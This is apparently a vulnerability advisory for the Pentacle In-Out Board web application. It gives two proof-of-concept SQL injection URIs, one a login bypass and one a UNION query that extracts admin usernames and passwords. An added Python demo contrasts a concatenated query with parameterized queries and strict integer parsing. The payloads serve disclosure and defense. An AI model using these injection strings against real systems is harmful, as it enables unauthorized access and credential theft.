Pentacle In-Out Board Multiple SQL Injection Vulnerabilities


These issues can be exploited through use of a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[ptdir]/login.asp?username=any&password=' or '1'='1

http://www.example.com/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes
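The following is an added example, not code from the advisory or from the vendor. It shows why the login.asp value above defeats a string-concatenated query and how a parameterized query and strict integer parsing of newsid close both issues. It assumes a query shape for the application, uses an in-memory SQLite database with constructed data in place of the application's own database, and all function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the application's user table (sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pt_users (userid INTEGER, username TEXT, "
               "userpassword TEXT, useradmin INTEGER)")
    db.execute("INSERT INTO pt_users VALUES (1, 'admin', 'sample-pass', 1)")
    return db

def login_concatenated(db, username, password):
    # Assumed shape of the flawed query: input is pasted into the SQL text,
    # so a quote in the input changes the structure of the WHERE clause.
    sql = ("SELECT userid FROM pt_users WHERE username='" + username +
           "' AND userpassword='" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    # Placeholders keep the input as data; a quote is compared literally.
    sql = "SELECT userid FROM pt_users WHERE username=? AND userpassword=?"
    return db.execute(sql, (username, password)).fetchone() is not None

def parse_newsid(raw):
    # newsid is a numeric key: accept a short run of ASCII digits only.
    if not (raw.isascii() and raw.isdigit()) or len(raw) > 9:
        raise ValueError("newsid must be a positive integer")
    return int(raw)

if __name__ == "__main__":
    db = make_db()
    poc_password = "' or '1'='1"   # password value from the login.asp URI
    print("concatenated :", login_concatenated(db, "any", poc_password))
    print("parameterized:", login_parameterized(db, "any", poc_password))
    print("valid login  :", login_parameterized(db, "admin", "sample-pass"))
    try:
        parse_newsid("11 union select 0,userpassword,0,username,0,0,0,0")
    except ValueError as err:
        print("newsid rejected:", err)
```
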


 

Copyright 2010, SecurityFocus